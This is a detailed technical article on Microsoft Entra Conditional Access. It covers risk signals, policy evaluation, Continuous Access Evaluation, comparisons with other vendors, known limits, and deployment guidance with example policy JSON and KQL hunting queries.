Two parallel logs matter for risk. The Sign-in log is the universe: every interactive and non-interactive sign-in produces an entry. The riskDetections log is the sparse overlay: a riskDetection is emitted only when a detection fires for the sign-in. Most sign-ins produce a Sign-in log entry with no corresponding riskDetection. Only flagged sign-ins do [@ms-graph-riskdetection].

This is a common source of confusion. It is tempting to assume "ID Protection scored every sign-in," and in a sense it did -- the detectors ran -- but the durable artefact exists only when at least one detector fired. To compute a per-sign-in distribution of risk you need to join the Sign-in log with the riskDetections log and treat the unjoined rows as "no risk flagged at the moment of issuance."

There is one more wrinkle. The detection taxonomy on the Microsoft Learn concept page and the riskEventType enum on the Graph schema are not perfectly aligned. The concept page lists mcasImpossibleTravel and authenticatorPhishing as named detection types; the Graph enum lists impossibleTravel (without the mcas prefix). The two surfaces sometimes use different value names for the same logical detection -- a UI display string versus a Graph enum value. Detection engineers writing KQL against the Sign-in logs should account for both.

6.3 How CA consumes risk

Conditional Access evaluation runs in a fixed order: assignments are checked first (does this sign-in match this policy at all?), then conditions (do all the condition predicates hold?), then grants (which controls are demanded?), then session controls (which token lifetime, sign-in frequency, persistent browser).

The key semantic, repeated across the Microsoft Learn documentation: a block grant in any policy matching the sign-in overrides any allow grant in any other policy. The policy plane is not just additive; it has an explicit precedence rule.

flowchart TD A[Sign-in request] --> B[First-factor auth] B --> C[Enumerate matching policies] C --> D{Any policy matches?} D -- No --> E[Default allow with token] D -- Yes --> F[Evaluate conditions per policy] F --> G{Block grant in any match?} G -- Yes --> H[Deny access return error] G -- No --> I[Aggregate required grants] I --> J{All grants satisfied?} J -- No --> K[Issue challenge MFA or device] J -- Yes --> L[Apply session controls] L --> M[Issue access token]

The pseudocode below is a compressed restatement of that flow. It is not Microsoft source code; it is the algorithmic shape an admin should keep in their head when reading a policy or debugging a sign-in.

{` function evaluate(signin) { const matching = allPolicies.filter(p => p.state !== 'disabled' && matchesAssignments(p.conditions, signin) && matchesConditions(p.conditions, signin) );

// Block precedence: any block grant wins if (matching.some(p => p.grantControls.builtInControls.includes('block'))) { return { decision: 'DENY', reason: 'block grant matched' }; }

// Aggregate required grants across matching policies const requiredGrants = new Set(); for (const p of matching) { for (const g of p.grantControls.builtInControls) requiredGrants.add(g); if (p.grantControls.authenticationStrength) { requiredGrants.add('authStrength:' + p.grantControls.authenticationStrength.id); } }

const satisfied = [...requiredGrants].every(g => signin.satisfies(g)); if (!satisfied) { return { decision: 'CHALLENGE', missing: [...requiredGrants].filter(g => !signin.satisfies(g)) }; }

// Apply session controls (token lifetime, sign-in frequency, persistent browser) const session = mergeSessionControls(matching.map(p => p.sessionControls)); return { decision: 'ALLOW', session }; }

const result = evaluate({ user: 'alice@contoso.com', app: 'Office365 Exchange Online', location: { ip: '203.0.113.42', country: 'PT' }, device: { compliant: true, joinType: 'Entra' }, signInRisk: 'low', userRisk: 'none', satisfies(grant) { const mfa = ['mfa', 'authStrength:phishingResistantMfa']; return mfa.includes(grant) || grant === 'compliantDevice'; }, }); console.log(JSON.stringify(result, null, 2)); `}

Risk-based conditions require Entra ID P2 [@ms-id-protection-overview]. Without that licence, the signInRiskLevels and userRiskLevels arrays in a policy are ignored. The rest of the engine works the same.

6.4 The grants

Each policy declares a set of grants. The grants are additive within a policy (all required to satisfy the policy) but the block grant in any matching policy takes precedence over allow grants in any other policy. Here are the grants currently in the schema:

Grant	What it requires	Notes
`block`	Deny access.	Always wins against allow grants.
`mfa`	Any MFA method registered for the user.	The legacy generic-MFA grant; replaced in modern deployments by Authentication Strength.
`requireAuthenticationStrength`	A named bundle of acceptable methods.	The modern grant. Built-in strengths include phishing-resistant [@ms-auth-strengths].
`compliantDevice`	The device record has `isCompliant: true`.	Set by Intune or a third-party compliance partner.
`domainJoinedDevice`	Hybrid Azure AD joined device.	Requires Entra Connect on-prem trust.
`approvedApplication`	Use an approved client app.	A small allow-list of Microsoft mobile apps.
`compliantApplication`	An app under an Intune App Protection Policy.	Mobile app management.
`passwordChange`	User must change their password.	Used for password-leaked recovery.
`requireTermsOfUse`	User must accept a terms-of-use document.	Used for compliance and guest scenarios.

A named, ordered bundle of acceptable authentication methods that a CA grant can demand. The three built-in strengths are *MFA strength* (any registered second factor), *Passwordless MFA strength* (no password used), and *Phishing-resistant MFA strength* (FIDO2 security key, Windows Hello for Business or a platform credential, or multifactor certificate-based authentication) [@ms-auth-strengths]. The phishing-resistant strength is the canonical modern grant for high-value access.

The Authentication Strength grant is where the phishing-resistance story lives in 2026. A policy that demands the phishing-resistant strength refuses to accept TOTP or SMS or push as the second factor. Only credentials with cryptographic binding to the device or hardware token will satisfy the grant. That class of credential, by construction, cannot be replayed by an adversary-in-the-middle phishing kit -- because the underlying WebAuthn ceremony is bound to the origin of the relying party.

6.5 The Windows-side handoff

PRT issuance is an interactive sign-in. It goes through CA like any other.

A long-lived refresh token issued to a Windows session at user sign-in to Entra-joined or hybrid-Entra-joined devices. The PRT is bound to the device's TPM where one is available, and it grants the user single sign-on to all CA-targeted apps from that Windows session. Issuance is subject to CA evaluation; if a CA policy demands compliant device, the device must already be marked `isCompliant` before the PRT is issued.

The compliance state lands on the device object as isCompliant. Intune (or a third-party MDM through Intune's compliance-partner API) writes that field after evaluating the device against a compliance policy: disk encrypted, OS patched, antivirus running, jailbreak detection clean, and so on. CA reads it on subsequent policy evaluations. If a policy requires compliantDevice and the device object says isCompliant: false, the grant is not satisfied.

The operational seam to on-prem Active Directory runs the other direction. Kerberos and NTLM against on-prem domain controllers never consult Entra. The Microsoft Learn CA overview is explicit: CA is a cloud control plane; on-prem authentication is outside its scope [@ms-ca-overview]. This is the limit Section 8 will name precisely.

6.6 CAE in session

The third plane. Wire format lives in two Microsoft Learn pages: the claims-challenge page [@ms-claims-challenge] and the app-resilience CAE page [@ms-app-resilience-cae].

A client opts in to CAE by advertising the cp1 capability via the xms_cc claim in token requests. In MSAL, that opt-in looks like WithClientCapabilities(new[] { "cp1" }) [@ms-app-resilience-cae]. The Microsoft Learn claims-challenge page says it cleanly: "The only currently known value is cp1" [@ms-claims-challenge].

When the policy plane sees a critical event after the token was issued, the resource API responds to the next call with HTTP 401 Unauthorized and a WWW-Authenticate header of the shape:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer authorization_uri="<entra-authorize-endpoint>", error="insufficient_claims", claims="<base64-encoded JSON>"

The claims value is a base64-encoded JSON object that the client passes verbatim to the token endpoint when acquiring a fresh token [@ms-claims-challenge][@ms-app-resilience-cae]. The IdP evaluates the embedded claims, runs CA again with the new context, and issues a new token (or refuses).

The HTTP wire format CAE uses to revoke a session mid-flight. A CAE-aware resource API returns `HTTP 401` with `WWW-Authenticate: Bearer error="insufficient_claims", claims=""`. The client replays the base64 blob to Entra; Entra re-runs CA with the new context; the client receives a fresh token or a definitive refusal. The wire format is documented at [@ms-claims-challenge] and demonstrated at [@ms-app-resilience-cae].

Note: The CAE-aware capability is signalled by the client, not by the token. The client advertises cp1 via xms_cc; the token's CAE-awareness shows up as its lifetime (up to 28 hours) and the resource API's willingness to issue a claims challenge. Folk knowledge that says "look for a cae claim in the JWT" is incorrect.

The Microsoft Learn CAE document enumerates five critical events: account disabled or deleted, password change or reset, MFA enabled by an administrator, administrator token revocation, and high user risk detected by ID Protection [@ms-cae-concept]. A parallel pathway, Conditional Access policy evaluation, propagates network-location and policy changes to CAE-aware resource providers on the same channel. For IP-location changes the latency is "instant"; for everything else the ceiling is up to 15 minutes [@ms-cae-concept].

sequenceDiagram participant C as Client app participant R as Resource API CAE aware participant E as Entra token issuer participant P as ID Protection Note over C: Client holds long-lived CAE token C->>R: GET messages with bearer token R->>R: Token still cryptographically valid P->>E: High user risk event for Alice E->>R: Push critical event Alice high risk C->>R: GET messages with bearer token again R->>C: 401 WWW-Authenticate insufficient_claims claims base64 C->>E: Token request with claims blob and cp1 capability E->>E: Re-run CA with new context E-->>C: New token or definitive refusal C->>R: Retry with new token

{` // Simplified MSAL.js-shaped pseudocode for CAE opt-in and challenge handling const ENTRA_AUTHORITY = ''; const EXCHANGE_ENDPOINT = ''; const MAIL_READ_SCOPE = '';

const msal = new PublicClientApplication({ auth: { clientId: '', authority: ENTRA_AUTHORITY }, });

async function callExchange() { let token = await msal.acquireTokenSilent({ scopes: [MAIL_READ_SCOPE], clientCapabilities: ['cp1'], // advertise CAE awareness });

let res = await fetch(EXCHANGE_ENDPOINT, { headers: { Authorization: 'Bearer ' + token.accessToken }, });

if (res.status === 401) { const header = res.headers.get('WWW-Authenticate') || ''; const m = /claims="([^"]+)"/.exec(header); if (m) { // Replay the embedded claims to acquire a fresh token token = await msal.acquireTokenSilent({ scopes: [MAIL_READ_SCOPE], claims: Buffer.from(m[1], 'base64').toString('utf8'), clientCapabilities: ['cp1'], }); res = await fetch(EXCHANGE_ENDPOINT, { headers: { Authorization: 'Bearer ' + token.accessToken }, }); } }

console.log('HTTP', res.status); }

callExchange(); `}

Key idea: CAE inverts the conventional trade-off: lengthen the token, shorten the revocation. The token can live 28 hours because revocation is an event, not a clock.

The chain is now visible. The signal plane scored Alice's Tuesday sign-in. The policy plane evaluated the policies. The token issuer issued an access token (CAE-aware because Outlook advertises cp1). Exchange Online accepted the token and returned mail. If, twelve minutes from now, Alice's account is flagged high risk because a different sign-in attempt fires leakedCredentials, the critical event will fire, Exchange will issue a claims challenge, and Outlook will either acquire a fresh token (passing the new CA evaluation) or surface the refusal to the user.

Six independent components co-decided on one access event. Microsoft is one vendor. The same problem has been solved differently by Google, Okta, AWS, Cloudflare, and Zscaler. The Microsoft answer is not the only correct answer.

7. How others do it

Microsoft chose to enforce at token issuance and claims challenge. Google chose to enforce at every HTTP request via a reverse proxy. AWS chose a decidable policy DSL. These are not minor variations; they are different answers to "where does the policy engine live in the data path?"

Both Microsoft's and Google's models scale. Neither is strictly better. The choice is a function of what the enterprise already runs.

Google BeyondCorp, IAP, Chrome Enterprise Premium

Google's Identity-Aware Proxy puts the policy engine in the data path. The documentation calls it bluntly: "IAP lets you establish a central authorization layer for applications accessed by HTTPS, so you can use an application-level access control model instead of relying on network-level firewalls" [@google-iap]. Every HTTP request to an IAP-protected app passes through the proxy. The proxy authenticates the user (via Google Account, Workforce Identity Federation, or Identity Platform), evaluates a Common Expression Language policy against the request context, and -- on allow -- forwards the request to the backend with signed identity headers.

The BeyondCorp Enterprise product (recently rebranded as Chrome Enterprise Premium) layers context-aware access on top: device posture, geographic location, time of day [@google-bce-overview]. The architecture matches the 2014 USENIX paper [@ward-beyer-2014-beyondcorp] and the 2016 production follow-up [@osborn-2016-beyondcorp].

The strength is per-request authorization: every HTTP call is its own decision point. The weakness, from the M365 perspective, is that IAP does not gate Microsoft 365 first-party API traffic. The Outlook client does not route through Google's IAP; it routes through Entra and Exchange Online. For Microsoft 365 workloads, IAP is complementary at best.

Okta Identity Engine and ThreatInsight

Okta's policy engine is closer to Microsoft's structurally: the identity provider is the policy engine, app sign-on policies live on the IdP, and the resource side relies on the IdP's token rather than a per-request proxy. The Okta Identity Engine documents the rule shape: "App sign-in policies define how a user must authenticate to gain access to an app. They verify ... group membership, the IP zone they're signing in from, risk level, and others" [@okta-sign-on-policies]. Every new app gets a default policy with a single catch-all rule that allows access with two factors.

Okta ThreatInsight is the IP-reputation feed. The documentation describes it operationally: "Okta ThreatInsight aggregates data about sign-in activity across the Okta customer base to analyze and detect potentially malicious IP addresses ... password spraying, credential stuffing, brute-force cryptographic attacks" [@okta-threatinsight]. The signal coverage is narrower than ID Protection: ThreatInsight is IP-centric, where ID Protection runs a multi-detection ML pipeline on tokens, sessions, behaviour, and credentials.

AWS IAM Identity Center and Verified Access

AWS splits the problem. IAM Identity Center handles workforce SSO and trusted identity propagation to AWS services [@aws-iam-identity-center]. AWS Verified Access handles per-request authorization for HTTPS-fronted apps -- the ZTNA piece. The Verified Access docs put it plainly: "Verified Access evaluates each application access request in real time" and "verifies the trustworthiness of users and devices against a set of security requirements" [@aws-verified-access].

The interesting bit is the policy language: Cedar. Cedar is a deliberately decidable language for authorization policy. "Decidable" here is a precise term: the safety question (will some policy edit, in some future edit chain, leak this right?) is answerable by a static analyser for any Cedar policy [@cedar-security].

Cedar's intentional non-Turing-completeness is the language-design hedge against the Harrison-Ruzzo-Ullman undecidability result the next section will name. The trade-off is expressiveness: Cedar cannot express arbitrary computational predicates, which is the price of being analysable [@cedar-security].

Cloudflare Access and Zscaler Private Access

Cloudflare Access is an edge proxy. Policies are deny-by-default, with four building blocks: Actions (Allow, Block, Bypass, Service Auth), Rule types (Include, Require, Exclude), Selectors, and Values [@cloudflare-access-policies]. The deny-by-default semantics are explicit: "Since Access is deny by default, users who do not match a Block policy will still be denied access unless they explicitly match an Allow policy" [@cloudflare-access-policies]. Cloudflare also ships a policy tester that lets administrators dry-run a policy against the existing user population [@cloudflare-access-policy-mgmt].

Zscaler Private Access is a broker-based ZTNA: the user connects to a Zscaler edge node, the broker establishes a connection to the private app, and "users never access the corporate network, and apps are never exposed to the public internet" [@zscaler-zpa]. Zscaler's own marketing surveys put the VPN-replacement framing in numbers: "91% of organizations are concerned that VPNs compromise their security" and "56% of organizations suffered one or more VPN-related attacks in 2023-2024" [@zscaler-zpa].

Architecturally, Cloudflare Access and ZPA both sit closer to BeyondCorp than to Microsoft CA: the policy engine is in the data path; the protected resource is fronted by the proxy rather than gated at token issuance.

OpenID Shared Signals Framework and CAEP

Not a competitor: the cross-vendor wire format for what Microsoft built into CAE. On 22 September 2025, the OpenID Foundation approved three Final Specifications: the Shared Signals Framework 1.0, the Continuous Access Evaluation Profile 1.0, and the Risk Incident Sharing and Coordination Profile 1.0 [@helpnet-2025-openid][@openid-caep-final]. CAEP defines five event types -- Session Revoked, Token Claims Change, Credential Change, Assurance Level Change, Device Compliance Change -- as the cross-vendor revocation vocabulary.

Microsoft's CAE implementation is, in Microsoft's own words, "an industry standard based on Open ID Continuous Access Evaluation Profile" [@ms-cae-concept]. The Final Specifications from September 2025 are the canonical post-2025 reference; older drafts at OpenID's site are superseded.

Head-to-head comparison

The differences worth memorising:

System	Enforcement point	Native risk feed	Post-issuance revocation	Gates M365 first-party?	Best suited for
Microsoft Entra CA + ID Protection + CAE	Token issuer + CAE-aware resource APIs	ID Protection ML pipeline	CAE up to 15 min, instant for IP	Yes	M365 tenants
Google IAP / Chrome Enterprise Premium	HTTPS reverse proxy	Context-aware access signals	Per-request (always re-decides)	No	Google Cloud workloads
Okta Identity Engine + ThreatInsight	IdP token issuance	ThreatInsight IP feed	Limited, IdP-dependent	No	Vendor-neutral front door
AWS IAM Identity Center + Verified Access	Verified Access proxy + IAM	Trust providers (third-party)	Per-request for Verified Access	No	AWS-hosted apps
Cloudflare Access	Edge proxy	Risk score + identity factors	Per-request	No	Public web apps
Zscaler Private Access	Broker / edge node	Posture + identity	Per-request	No	Private app access

Per-cell sourcing for the table: the Microsoft row's "Yes" cell on M365 first-party gating is the directly-stated claim from the Microsoft Learn CA overview [@ms-ca-overview]. The other rows' "No" cells are negative inferences drawn from each peer's own product documentation, none of which advertises Microsoft 365 first-party API gating: Google IAP gates HTTPS-fronted apps behind the proxy [@google-iap]; Cloudflare Access deny-by-default applies to the apps fronted by Cloudflare [@cloudflare-access-policies]; Verified Access "evaluates each application access request" for HTTPS apps behind AWS [@aws-verified-access]; Zscaler ZPA brokers private app access [@zscaler-zpa]; Okta sign-on policies gate apps wired into Okta's IdP [@okta-sign-on-policies]. The cell semantics are "does the system gate Outlook/Teams/SharePoint/Graph first-party traffic" and the answer is structurally No outside Microsoft.

flowchart LR subgraph TOK[Token issuance model Microsoft Okta] U1[User] --> AT[Acquire token] AT --> CA1[CA evaluator] CA1 --> IS[Issue token] IS --> R1[Resource API validates token] R1 -. CAE 401 .-> AT end subgraph PRX[Data path proxy model Google BeyondCorp AWS Verified Access Cloudflare Zscaler] U2[User] --> PXY[Proxy intercepts every request] PXY --> POL[Policy evaluator at the proxy] POL --> BCK[Backend application] end

The honest observation worth sitting with: none of the proxy systems gates M365 first-party API traffic. Outlook, Teams, SharePoint, and Microsoft Graph route through Entra. For those workloads, Entra remains the only effective policy plane. The proxy systems gate the apps that sit behind the proxy -- internal apps, partner-facing apps, custom workloads. That makes BeyondCorp, Okta, Cloudflare Access, and ZPA complementary to Entra CA in an M365 environment, not substitutes for it.

Six systems, six architectural choices. None of them wrong. But what do they all leave on the table?

8. What Conditional Access fundamentally cannot do

Section 7 cannot be the ending. There are at least five things Conditional Access -- and every peer in Section 7 -- cannot do. Some are engineering limits; some are theorems. Both classes are worth naming.

(a) On-prem authentication

CA is a cloud control plane. Kerberos and NTLM against on-prem domain controllers do not consult Entra. There is no policy hook for the legacy Windows protocols. If a domain user signs in to a domain-joined workstation, authenticates to a file server, and accesses a share, no piece of that flow touches Conditional Access. The Microsoft Learn overview is explicit about the scope [@ms-ca-overview].

This is the operational seam between cloud identity and on-prem identity. State it plainly; do not soften.

Note: Conditional Access does not gate Kerberos or NTLM against on-prem domain controllers. If your threat model includes lateral movement after credential theft on the on-prem side, CA is not your defence. Layer in Defender for Identity, on-prem MFA gateways, or a privileged-access workstation architecture instead.

(b) Post-issuance token theft

Once a refresh token is exfiltrated -- whether via an adversary-in-the-middle phishing kit like Evilginx [@ms-aitm-phishing-blog], an infostealer that scrapes the token cache, or a malicious browser extension -- the pre-issuance CA evaluation is bypassed. The attacker has a bearer token. They can present it to the resource API directly. CAE-aware resource providers can revoke mid-session on the published critical-event list, but the latency ceiling is "up to 15 minutes" for non-IP events [@ms-cae-concept]. In fifteen minutes a competent attacker has done plenty.

The mitigation is device-bound credentials: Primary Refresh Tokens bound to TPM hardware, FIDO2 with hardware attestation, certificate-based authentication with hardware-protected keys [@ms-prt-concept]. A bearer token bound to a TPM is not exfiltratable in the same way; the wrapped key material never leaves the device.

(c) Consent-grant phishing

CA evaluates authentication, not authorization grants that a user makes to a malicious OAuth app. A user who clicks "Allow" on a permissions-consent prompt for an attacker-controlled app has performed an OAuth authorization, not a sign-in. The malicious app now has the user's delegated permissions for whatever scopes were granted. CA was not invoked because CA gates the user's sign-ins; it does not inspect the user's OAuth grants. Microsoft Defender for Cloud Apps documents the attack class as "risky OAuth apps" and ships investigation and remediation tooling on a separate plane from CA [@ms-illicit-consent-grant].

Admin consent settings, app governance policies, and explicit allow-listing of acceptable publishers live on that different plane. The policy admin who deploys CA needs to deploy app governance separately.

(d) Risk evaluation is probabilistic

Identity Protection produces a score, not a proof. A "high" risk level is a confidence; it is not the assertion "this sign-in is definitely an attack." No vendor in the Section 7 survey publishes precision or recall numbers for its risk engine. The operating point -- the threshold that maps a continuous score to discrete buckets -- is a trade-off that the vendor calibrates and the customer does not see.

This is a structural lower bound on any ML-driven risk plane, not a Microsoft-specific failure. Any classifier has false positives and false negatives. A risk-aware CA policy that says "block at high risk" will, with non-zero probability, block a legitimate sign-in. A policy that says "require MFA at medium risk" will, with non-zero probability, let through a sophisticated attacker whose detections fall under the threshold.

(e) Workload-identity CA is constrained by design

Block-only grants. No managed identities. No group assignments. The full human grant taxonomy does not transfer because a service principal cannot perform an MFA challenge, cannot register a FIDO2 key, cannot accept a terms-of-use document. The Microsoft Learn page on workload-identity CA enumerates the constraints precisely [@ms-workload-identity-ca]. Section 9 will name this as an open problem; for now, treat it as a documented limit.

The theorems behind the limits

Some of these limits are engineering choices that could be different in a future product. Some are deeper.

Saltzer and Schroeder 1975 [@saltzer-schroeder-1975] give the upper bound on aspirations: complete mediation across every authentication and authorization decision within scope of mediation. The principle does not constrain what is in scope. It constrains what you must do for whatever you have decided is in scope. On-prem AD is out of scope for CA by Microsoft's product decision; complete mediation cannot fix that, because the principle is about consistency within the boundary, not about expanding the boundary.

Harrison-Ruzzo-Ullman 1976 -- usually shortened to HRU [@harrison-ruzzo-ullman-1976] -- gives the lower bound on static analysis. The safety question in the general access-matrix model is undecidable. In informal terms: there is no general algorithm that proves a Conditional Access policy edit cannot, under some future edit chain, leak a sensitive right. This is why every vendor in the survey relies on evaluation-time mediation (the engine decides at the moment of the request) rather than static-proof analysis (the engine certifies in advance that no edit can ever leak). Cedar's intentional restriction to a decidable fragment, in AWS Verified Access, is the counter-strategy: trade expressiveness for analysability.

The bearer-token revocation trade-off is informal but real: the worst-case revocation latency is bounded below by the token's natural lifetime, unless a side channel exists. CAE is that side channel. Its latency is bounded by the propagation time of the channel (up to 15 minutes for non-IP events, instant for IP). Shorten the channel further and you discover that the IdP-to-resource-API event delivery has its own infrastructure costs.

The practical implication of HRU for a CA admin is that there is no tool, anywhere, that can examine your tenant's CA policies and certify that no sequence of policy edits could ever leak access to a sensitive resource. Vendors offer policy *testers* that simulate a single edit against the current population; that is decidable. The question "is the system safe under all possible future edits?" is not. This is why audit trails, change-control gates, and least-privilege role assignments on the CA admin role matter as much as the CA policies themselves.

Naming the limits clears the way to name the active unsolved problems -- the ones the field is still working on, where the current state of the art admits it is partial.

9. Where the policy plane is still incomplete

Microsoft's own 2026 documentation for Conditional Access on AI agents calls the current implementation "a lightweight enforcement mechanism designed to block unauthorized or risky agents, not a full policy suite." That is not marketing modesty. It is an admission that the most active frontier of policy enforcement -- agent identities -- is deliberately under-specified.

Five open problems sit on that frontier in 2026.

Organizations are expanding Zero Trust across more users, applications, and now a growing population of AI agent identities ... the Conditional Access Optimization Agent moves beyond static guidance to continuous, context-aware identity posture optimization. [@ms-techcom-ca-optimization-agent]

9.1 Agent identity policy semantics

What grants should exist for AI agents beyond block and allow? Useful candidate grants include: "read-but-not-move" for mail or files; "business-hours-only"; "any autonomous action requires a fresh sign-off from the on-behalf-of human." None of these exist as first-class CA grant types in 2026.

What does exist: CA targeting of agent identities -- the ability to match a policy on the agent identity rather than the human -- and the Conditional Access Optimization Agent, which gives administrators continuous recommendations on policy posture [@ms-techcom-ca-optimization-agent]. The targeting is there. The grant taxonomy is still mostly the human one, applied imperfectly.

9.2 Cross-vendor CAEP interop

The wire format was finalised in September 2025 [@helpnet-2025-openid][@openid-caep-final]. Production receiver coverage outside Microsoft Entra-internal resource providers is partial. Two large vendors agreeing on an event schema is necessary but not sufficient for cross-vendor revocation to work in practice; the receiving side needs to act on the events. The next eighteen months are the period in which CAEP either becomes the cross-vendor wire format for revocation, or it does not.

9.3 Workload-identity grant set

What richer expressions could exist for non-human identities? The current Microsoft Learn page lists workload-identity detections: investigationsThreatIntelligence, suspiciousSignins, adminConfirmedServicePrincipalCompromised, leakedCredentials, maliciousApplication, suspiciousApplication, anomalousServicePrincipalActivity, suspiciousAPITraffic [@ms-workload-identity-risk]. The detections exist; the grant taxonomy stops at block.

Candidate richer grants: "workload attestation" (the service principal proves it is running on attested infrastructure), "verifiable claim from a trusted attester" (a third party signs a statement about the workload), "step-up authorization for sensitive scopes" (a higher-privilege scope requires a separate per-request authorization step). None of these is generally available in 2026.

A non-human identity in Entra ID: a service principal, an application registration's owned service principal, or a managed identity in Azure. Workload identities authenticate via client secrets, client certificates, federated credentials, or (for managed identities) instance-metadata-service tokens. Conditional Access for workload identities currently applies only to single-tenant service principals registered in the tenant; it does not cover multi-tenant SaaS apps or managed identities [@ms-workload-identity-ca].

9.4 The break-glass paradox

Emergency-access accounts must be excluded from CA. If a CA misconfiguration locks out every admin, the break-glass account is the recovery path. But exclusion creates a high-value bypass: an attacker who compromises a break-glass account inherits its exclusion.

There is no clean answer. Microsoft's guidance is exclusion plus FIDO2 binding plus alerting: the break-glass accounts have hardware-bound FIDO2 keys (so they cannot be phished), they are excluded from all CA policies (so misconfiguration cannot lock them out), and every sign-in is alerted on (so misuse is detected within minutes) [@ms-emergency-access].

Run two break-glass accounts, not one. Store the FIDO2 keys in separate physical safes under separate custodians. Never use them for anything but a recovery exercise once per quarter; if they sign in unexpectedly, treat the alert as a P1 incident. The operational pattern accepts that you have a bypass and treats the bypass as the highest-value alert in the tenant [@ms-emergency-access].

9.5 The risk-engine transparency problem

No vendor in the Section 7 survey publishes model architecture, feature vector size, or per-detection precision and recall. Microsoft does not. Okta does not. Google does not. Defenders, auditors, and regulators must accept a black-box score.

This matters in three places. First, for incident response: when an "atypical travel" detection fires for an executive, the responder cannot see which features contributed and how strongly. Second, for compliance: an auditor asked to evidence the effectiveness of the control plane gets the operating output (3-tier risk levels) but not a quantitative evaluation. Third, for the risk-engine vendors themselves, who must respond to legitimate regulatory questions about model bias and operational reliability without revealing the architecture that attackers would use to evade detection.

The article does not predict a resolution. It names the gap.

The architecture is incomplete by admission. It is also actionable today. A competent tenant administrator can deploy a sensible baseline in an afternoon.

10. Using Conditional Access today

The architectural story ends; the operational story begins. Here is what a competent tenant looks like in 2026.

The licensing reality

Conditional Access is not a feature every Microsoft 365 tenant gets. It is a feature gated by SKU. The licensing tiers are:

Entra ID Free. Security Defaults only [@ms-security-defaults]. No Conditional Access policies. No risk-based conditions. No CA-driven CAE (the critical-event-evaluation subsystem -- for events like account disable, password reset, and high user risk -- still propagates to CAE-aware M365 services at the service layer regardless of SKU; see Section 6.6) [@ms-cae-concept].
Entra ID P1. Conditional Access is unlocked [@ms-ca-overview]. You can author policies with any of the non-risk conditions: users, apps, locations, devices, client app, platform. You can demand any of the non-risk grants.
Entra ID P2. Adds risk-based conditions. signInRiskLevels and userRiskLevels become usable [@ms-id-protection-overview]. ID Protection's full report pane (risky users, risky sign-ins, risk detections) is accessible. The legacy ID-Protection-side risk policies retire 1 October 2026 [@ms-id-protection-policies].
Workload Identities Premium. A separate SKU. Unlocks CA scoped to service principals [@ms-workload-identity-ca].

This corrects a premise discarded earlier: "Conditional Access is the policy plane every M365 tenant runs on" is not true. Many tenants run on Security Defaults. The "policy plane every tenant runs on" is the cloud sign-in pipeline; CA is the configurable richer layer that P1+ tenants opt into.

Start with the managed baselines

Microsoft-managed Conditional Access policies are the recommended starting point [@ms-managed-policies]. They auto-deploy in Report-only mode, run for at least 45 days while administrators review the impact in the Sign-in logs, and are auto-enabled with a 28-day pre-enablement notification unless administrators opt out [@ms-managed-policies]. The currently shipping baselines, per Microsoft Learn, include:

MFA for admins accessing Microsoft admin portals (the most-privileged roles).
MFA for users who already have per-user MFA enabled (a migration aid).
MFA and reauthentication for risky sign-ins (the P2 baseline).
Block legacy authentication.
Block access for high-risk users (P2-tier protection on the user-risk surface).
Block all high-risk agents accessing all resources (Preview, AI-agent surface).

The original announcement called for a 90-day report-only window [@weinert-2023-managed-policies][@helpnet-2023-microsoft-entra-policies]. The current default is 45 days [@ms-managed-policies]; the window shrank as Microsoft gained confidence that customers were not surprised by the auto-enablement.

Five custom policies on top of the baselines

Beyond the managed policies, every well-run tenant in operational experience runs five custom policies on top of the baselines [@ms-ca-policy-common]: block legacy authentication unconditionally [@ms-managed-policies]; require the phishing-resistant Authentication Strength for any user in a privileged role [@ms-auth-strengths]; require compliantDevice for admin centres, finance apps, and customer-data exports [@ms-intune-compliance-partners]; restrict privileged sign-ins to a named-location allow-list with block-or-step-up outside it [@ms-ca-network]; and, where Entra ID P2 is licensed, demand a sign-in-risk-based step-up (MFA at high risk, a passwordless or phishing-resistant method at medium risk) [@ms-id-protection-policies].

Note: 1. Block legacy authentication. 2. Phishing-resistant Authentication Strength for admin roles. 3. Require compliant device for sensitive applications. 4. Named-location restrictions for privileged roles. 5. Sign-in-risk-based step-up where Entra ID P2 is available.

Automation entry points (Microsoft Graph)

The Graph endpoints administrators care about:

GET /identity/conditionalAccess/policies -- list policies. POST to create, PATCH to update [@ms-graph-capolicy].
GET /identityProtection/riskDetections -- the per-detection log. Filterable by riskLevel, riskState, userPrincipalName, activityDateTime [@ms-graph-riskdetection].
GET /identityProtection/riskyUsers -- the per-user risk view.

A policy authored in code looks like this (truncated for readability):

{
  "displayName": "Require phishing-resistant for admins",
  "state": "enabledForReportingButNotEnforced",
  "conditions": {
    "users": { "includeRoles": ["62e90394-69f5-4237-9190-012177145e10"] },
    "applications": { "includeApplications": ["All"] }
  },
  "grantControls": {
    "operator": "OR",
    "authenticationStrength": { "id": "00000000-0000-0000-0000-000000000004" }
  }
}

The recommended deployment dance is enabledForReportingButNotEnforced first; let the Sign-in log show you the impact for a calibration window; promote to enabled only after the report-only data matches expectations [@ms-ca-report-only].

Audit-time visibility

Three surfaces matter:

Sign-in logs in the Entra portal show the per-sign-in evaluation, including which CA policies matched and which grants were satisfied.
Risk-detection log in Identity Protection (P2 only) shows the per-detection narrative: which riskEventType fired, with what additionalInfo, against which user.
The What-If tool simulates a policy evaluation for a hypothetical sign-in, before you enable a policy.

Detection engineering

For E5 tenants, the Sign-in logs and risk detections flow into Microsoft Sentinel (via the Microsoft Entra ID connector) or Defender XDR [@ms-sentinel-aad-connector]. A KQL skeleton for high-risk-with-CA-failure looks like:

SigninLogs
| where ResultType != 0
| join kind=inner (AADRiskDetections | where RiskLevel == "high") on UserPrincipalName, CorrelationId
| project TimeGenerated, UserPrincipalName, IPAddress, ConditionalAccessStatus, RiskEventType, FailureReason

The aggregate scale figure is worth remembering: Microsoft processes "more than 100 trillion security signals" daily across all identity products [@ms-managed-policies]. The detection engineer is consuming a small slice that landed in their tenant.

Run the following in Microsoft Sentinel or the Entra advanced hunting blade to surface sign-ins that succeeded *despite* a high-confidence risk detection -- the most operationally interesting subset. The query is original to this article; the schema it targets is the canonical Microsoft Sentinel Entra ID connector tables `SigninLogs` and `AADRiskDetections` [@ms-sentinel-aad-connector], and the join-and-filter pattern follows the practice documented in Microsoft's Sentinel hunting guidance [@ms-sentinel-hunting].

let window = 7d;
SigninLogs
| where TimeGenerated > ago(window)
| where ResultType == 0
| where ConditionalAccessStatus == "success"
| join kind=inner (
    AADRiskDetections
    | where TimeGenerated > ago(window)
    | where RiskLevel == "high"
) on UserPrincipalName, CorrelationId
| project TimeGenerated, UserPrincipalName, IPAddress, AppDisplayName, RiskEventType, ConditionalAccessPolicies
